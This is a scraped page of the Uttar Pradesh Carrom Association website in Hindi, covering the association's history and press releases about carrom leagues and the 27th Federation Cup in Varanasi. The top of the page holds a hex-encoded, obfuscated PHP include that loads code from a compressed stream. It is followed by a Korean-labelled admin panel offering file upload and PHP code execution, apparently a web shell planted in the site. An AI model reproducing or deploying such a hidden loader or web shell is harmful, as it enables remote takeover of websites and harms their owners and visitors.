313138203d2027636f6d7072657373273b0d0a2470323238203d20272e7a6c69623a2f2f273b0d0a2470333338203d2027776f6e64657266756c273b0d0a2470343438203d20272e677a273b0d0a696e636c756465282470313138202e202470323238202e20247033333 관리-도구

관리-도구

경로: //tmp

/tmp/

폴더 내용:


파일 업로드:


PHP 코드 실행:


उत्तर प्रदेश कैरम एसोसिएशन
Logo
Uttar Pradesh कैरम एसोसिएशन

उत्तर प्रदेश कैरम एसोसिएशन में आपका स्वागत है

जहाँ रणनीति, सटीकता और जुनून का संगम होता है

चैंपियंस की कम्युनिटी से जुड़ें। टूर्नामेंट्स के बारे में जानें, अपनी कौशल निखारें, और बोर्ड पर दबदबा बनाएं।

क्लिक करें

Elecection 2025

PDF डाउनलोड करें

क्लिक करें

29th Senior Carrom Championship, Prayagraj 2024-25

PDF डाउनलोड करें

ग्लोबल कम्यूनिटी

कनेक्ट विद कैरम लवर एण्ड ग्रोव योर नेटवर्क

कस्टम बोर्डस

बेहतरीन अनुभव के लिए अपना पसंदीदा डिज़ाइन, रंग और आकार चुनें।

Legends of the Board

संक्षिप्त इतिहास

वैसे तो उत्तर प्रदेश में कैरम खेल की गतिविधियां इलाहाबाद में साठ के दशक से ही गोरखपुर, बरेली, लखनऊ , कानपुर शाहजहांपुर में होने वाले टूर्नामेन्टों के माध्यम से शुरू हो चुकी थी जिसमें कैरम के अनन्य प्रेमी स्व0 रामदयाल तिवारी जी के प्रयास से न्यू स्टार क्लब के माध्यम से प्रतियोगिताओं का नियमित सिलसिला चल पड़ा था...

पूरा इतिहास पढ़ें

"उत्तर प्रदेश में कैरम की गतिविधियों को नियमित और विधिवत विस्तारित करने के साथ साथ आल इन्डिया कैरम फेडरेशन से सम्बद्धता प्राप्त करने के लिये... वर्ष 18 जुलाई 1971 में उत्तर प्रदेश कैरम एसोसिएशन का गठन किया गया।"

गठन

18 जुलाई 1971

Stay Updated

ताज़ा खबरें

सभी खबरें देखें
**स्वर्गीय  लक्ष्मी देवी स्मृति समर कैरम लीग  * * **पच्चीसवां  दिन **

**स्वर्गीय लक्ष्मी देवी स्मृति समर कैरम लीग * * **पच्चीसवां दिन **

प्रकाशनार्थ ***स्वर्गीय  लक्ष्मी देवी स्मृति समर कैरम लीग  * * **पच्चीसवां  दिन **        *  विनोद यादव  और हर्षित  केशरी भी  पुरुष एकल  के अन्तिम आठ में, गौरव  गुप्ता और रितम्भरा की जोड़ी मिश्रितयुगल के फाइनल में *  ।     वाराणसी, 5  जुलाई।    वाराणसी कैरम एसोसिएशन  और पटेल स्पोर्टिंग क्लब  के संयुक्त तत्वाधान  में ईंगलिसियालाइन के चन्द्रा  त्रिपाठी  स्मृति क्रीडा कक्ष में पिछले  चौबीस  दिनों से  चल रही   *स्वर्गीय  लक्ष्मी देवी स्मृति समर कैरम लीग*  के अन्तर्गत  खेले  जा रहे  पुरुष एकल के अन्तिम  दो  लीग  मैचों के  प्राप्त  परिणाम  के  अनुसार  विनोद यादव  और हर्षित  केशरी भी अन्तिम  आठ के लिये क्वालीफाई  कर गये ।आज ही खेले गये मिश्रित युगल  के दूसरे सेमीफाइनल मैच  में  गौरव  गुप्ता और रितम्भरा की जोड़ी  ने अशोक सिंह  और रिषिता केशरी  की  जोड़ी  को हराकर फाइनल  में  प्रवेश  कर लिया ।     आज खेले गए   पुरूष वर्ग   के लीग मैचों के परिणाम  इस प्रकार  रहे =  सीनियर  खिलाड़ी  ने    जाने माने  खिलाड़ी  जमुनाधर उर्फ झुनझुन गुप्त को तीन संघर्षपूर्ण  सेटों में  20=08,  18=15 और 25=15 से हरा कर अन्तिम  आठ  में प्रवेश  पाया तो वहीं अत्यंत  प्रतिभावान  जूनियर खिलाड़ी  हर्षित  केशरी ने जाने माने सीनियर खिलाड़ी   अभिषेक  विश्वकर्मा को   तीन संघर्षपूर्ण  सेटों में हराकर पहली बार किसी सीनियर  प्रतियोगिता के क्वार्टर फाइनल  में प्रवेश  पाकर  सनसनी फैला दिया  । जब कि आज ही खेले गये मिश्रित युगल  के अन्तिम  सेमीफाइनल मैच  में गौरव गुप्ता और रितम्भरा की जोड़ी  ने अशोक सिंह और रिषिता केशरी  के युगल  को दो सीधे सेटों में 19=05,25=05  से हराकर फाइनल में  शानदार प्रवेश  किया ।   *आयोजन  समिति के अनुसार  प्रतियोगिता का फाइनल  और पुरस्कार वितरण समारोह आगामी 9 जुलाई दिन रविवार को  अपरान्ह  3 =30 बजे सिंह  निकेतन मलदहिया में  होगा  ।*            मैचों का संचालन आयोजन समिति के अध्यक्ष  बैजनाथ सिंह तथा सचिव अश्वनी चक्रवाल की देखरेख में प्रधान निर्णायक रमेश कुमार  वर्मा  के नेतृत्व  में निर्णायक,   कृष्ण दयाल यादव ,  हरियाली सिंह ,   कामना गुप्ता,   ने किया ।  *कैरम खेल समाचार *सेवा  में, *समस्त समाचार पत्र एवम समाचार माध्यम । *भवदीय, अश्वनी चक्रवाल  सचिव प्रतियोगिता आयोजन समिति

विस्तार से पढ़ें
27 वें फेडरेशन कप के लिये उत्तर प्रदेश की 16 सदस्यीय महिला पुरुष टीम घोषित

27 वें फेडरेशन कप के लिये उत्तर प्रदेश की 16 सदस्यीय महिला पुरुष टीम घोषित

प्रकाशनार्थ * 27 वें फेडरेशन कप के लिये उत्तर प्रदेश की 16 सदस्यीय महिला पुरुष टीम घोषित। * वाराणसी, 6 मार्च। आगामी 26 से 29 मार्च के बीच वाराणसी के जीवनदीप शिक्षण समूह परिसर बड़ालालपुर में आयोजित होने जा रहे 27 वें आल इन्डिया फेडरेशन कप कैरम टूर्नामेंट में भाग लेने वाली महिला और पुरुष टीम की आज घोषणा कर दी गयी ।उत्तर प्रदेश कैरम एसोसिएशन के अध्यक्ष और चयन समिति के अध्यक्ष श्री बैजनाथ सिंह के अनुसार मेजबान स्टेट होने के नाते उत्तर प्रदेश को हर स्टेट से दुगुना खिलाड़ी अर्थात चार की जग॔ह आठ आठ महिला और पुरुष रैंकिंग खिलाड़ियो को फेडरेशन द्वारा टूर्नामेंट में भाग लेने का अवसर दिया जायेगा ।इसके अलावा पुरुष टीम में दो खिलाड़ी रिजर्व भी रख्खे गये हैं ।उत्तर प्रदेश कैरम एसोसिएशन के अध्यक्ष बैजनाथ सिंह ने टीम घोषित करते हुये बताया कि उनकी अध्यक्षता में चयन समिति के सदस्य प्रदेश सचिव श्री जहीर अहमद , प्रदेश उपाध्यक्ष और नेशनल अम्पायर सरदार रणवीर सिंह ,और प्रदेश कोषाध्यक्ष तथा अन्तरराष्ट्रीय रेफरी श्री रमेश वर्मा द्वारा चयनित टीम ईस प्रकार है ।*महिला टीम * =1= कामना गुप्ता 2= रितम्भरा 3= हरियाली सिंह 4= दीपाली यादव 5= अंजलि गुप्ता 6= रेणुकाराय 7= सुमन गिनोडिया 8=रिषिता केशरी टीम मैनेजर = रीनी श्रीवास्तव पुरुष टीम =1= मोहम्मद आरिफ 2= मोहम्मद शाहिद 3=फैसल खान 4= शिवदयाल यादव 5=पी0एस0 सिंहारिया 6=मोहम्मद अजहर 7= कृष्ण दयाल यादव 8= धर्म-दर्शन ।रिजर्व खिलाड़ी= गौरव गुप्त और उम्र तनवीर टीम मैनेजर = विनोद यादव सेवा में,*प्रकाशनार्थ **समस्त समाचार पत्र एवम समाचार माध्यम * भवदीय, बैजनाथ सिंहअध्यक्षउत्तर प्रदेश कैरम एसोसिएशन

विस्तार से पढ़ें
27 वें आल इन्डिया फेडरेशन कप कैरम टूर्नामेंट  की तैयारियों

27 वें आल इन्डिया फेडरेशन कप कैरम टूर्नामेंट की तैयारियों

*प्रकाशनार्थ * * 27 वें आल इन्डिया फेडरेशन कप कैरम टूर्नामेंट की तैयारियों का जायजा लेने 18 फरवरी को वाराणसी आयेंगे ईन्टरनेशनल कैरम फेडरेशन के सेक्रेटरी जनरल श्री वी0डी0 नारायन और आल ईन्डिया कैरम फेडरेशन की महासचिव श्रीमती भारती नारायन * वाराणसी, 14 फरवरी । आगामी 26 से 29 मार्च 2023 के बीच जीवनदीप शिक्षण समूह, बड़ालालपुर चांदमारी, वाराणसी में आयोजित होने वाले 27 वें आल ईन्डिया फेडरेशन कप कैरम टूर्नामेंट 2022=23 वाराणसी के आयोजन सम्बन्धित तैय्यारियों का पर्यवेक्षण करने के लिये ईन्टरनेशनल कैरम फेडरेशन के सेक्रेटरी जनरल माननीय श्री वी0डी0 नारायन जी और आल ईन्डिया कैरम फेडरेशन की महासचिव माननीया श्रीमती भारती नारायन जी आगामी* 18 फरवरी 2023 * को रात्रि 8 बजे बाबतपुर एअरपोर्ट पर पधारेंगे, जहां वाराणसी कैरमएसोसिएशनऔरउत्तरप्रदेशकैरमएसोसिएशन की ओर से उनकी अगवानी की जायेगी । वाराणसी में रात्रि विश्राम के बाद दोनों माननीय अतिथि आल ईन्डिया कैरम फेडरेशन के एसोसिएट वाइस प्रेसिडेंट डॉक्टर अशोक सिंह जी और उत्तर प्रदेश कैरम एसोसिएशन के अध्यक्ष बैजनाथ सिंह के साथ टूर्नामेंट स्थल जीवन दीप शिक्षण समूह बड़ालालपुर चादमारी का दौरा करके सभी तरह ब्यवस्था का जायजा लेंगे तपश्चात * अपरान्ह डेढ़ बजे सिंह निकेतन मलदहिया* में डाक्टर अशोक सिंह और मेरे साथ पत्रकार वार्ता करेंगे । पत्रकार वार्ता के तुरन्त बाद में अपरान्ह तीन बजे आयोजन समिति के स्थानीय सदस्यों के साथ आयोजन सम्बन्धित प्रत्येक बिन्दु पर पर गहन विचार विमर्श करने के पश्चात सायं सात बजे बाबतपुर हवाई अड्डे से दिल्ली के लिये प्रस्थान कर जायेंगे । उल्लेखनीय बात है कि पहली बार डॉक्टर अशोक सिंह और उत्तर प्रदेश कैरम एसोसिएशन के आमंत्रण पर इस नेशनल लेवल के इस चार दिसीय प्रतिष्ठापरक टूर्नामेंट के दौरान पहली बार * ईन्टरनेशनल कैरम फेडरेशन के अध्यक्ष माननीय श्री जोसफ मेयर साहब* वाराणसी पधारेंगे इसके साथ ही * आल ईन्डिया कैरम फेडरेशन के अध्यक्ष और असम सरकार के पूर्व मंत्री तथा वर्तमान विधायक माननीय श्री राकिबुल हुसैन साहब* भी वाराणसी पधारने की स्वीकृति देचुके हैं । उल्लेखनीय है कि टूर्नामेंट के दौरान ही *28 मार्च 2023 *को आल इन्डिया कैरम फेडरेशन की साधारण सभा और एक्जक्यूटिव कमेटी की महत्वपूर्ण बैठकें भी नियोजित होंगी । सेवा में*सादर प्रकाशनार्थ * *समस्त समाचार पत्र एवम समाचार माध्यम। * भवदीय,बैजनाथ सिंहमहासचिवअध्यक्षउत्तर प्रदेश कैरम एसोसिएशनएवंआयोजन सचिवटूर्नामेंट कमेटी

विस्तार से पढ़ें
Carrom
5.0 शुरुआती कैरम क्लब प्रशिक्षक
Get In Touch

संपर्क करें

कोई सवाल है या सुझाव? हम यहाँ हैं और बोर्ड पर आपकी अगली चाल में मदद करने के लिए तैयार हैं।

ईमेल

info@upcarromassociation.com

कॉल

+91 98765 43210